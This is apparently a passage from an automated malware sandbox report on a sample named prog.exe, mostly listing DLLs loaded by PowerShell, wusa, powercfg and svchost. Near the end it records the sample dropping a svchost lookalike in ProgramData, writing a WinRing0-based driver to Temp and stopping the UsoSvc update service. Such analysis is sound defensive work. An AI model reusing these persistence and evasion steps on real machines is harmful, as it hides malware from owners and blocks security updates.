          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\ProgramData\win32\svhost.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: prog.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: prog.exeStatic file information: File size 2663424 > 1048576
          Source: prog.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x27d200
          Source: prog.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: svhost.exe, 00000023.00000003.2340216080.000002207FB50000.00000004.00000001.00020000.00000000.sdmp, pnhtlztmuvjx.sys.35.dr
          Source: prog.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: prog.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: prog.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: prog.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: prog.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: prog.exeStatic PE information: section name: .00cfg
          Source: svhost.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\prog.exeCode function: 0_2_00007FF6F1FB1394 push qword ptr [00007FF6F1FBE004h]; ret 0_2_00007FF6F1FB1403
          Source: C:\ProgramData\win32\svhost.exeCode function: 35_2_00007FF7E32F1394 push qword ptr [00007FF7E32FE004h]; ret 35_2_00007FF7E32F1403
          Source: C:\Windows\System32\conhost.exeCode function: 58_2_0000000140001394 push qword ptr [0000000140008004h]; ret 58_2_0000000140001403

          Persistence and Installation Behavior

          barindex
          Source: C:\ProgramData\win32\svhost.exeFile created: C:\Windows\TEMP\pnhtlztmuvjx.sysJump to behavior
          Source: C:\Users\user\Desktop\prog.exeFile created: C:\ProgramData\win32\svhost.exeJump to dropped file
          Source: C:\ProgramData\win32\svhost.exeFile created: C:\Windows\Temp\pnhtlztmuvjx.sysJump to dropped file
          Source: C:\Users\user\Desktop\prog.exeFile created: C:\ProgramData\win32\svhost.exeJump to dropped file
          Source: C:\ProgramData\win32\svhost.exeFile created: C:\Windows\Temp\pnhtlztmuvjx.sysJump to dropped file
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
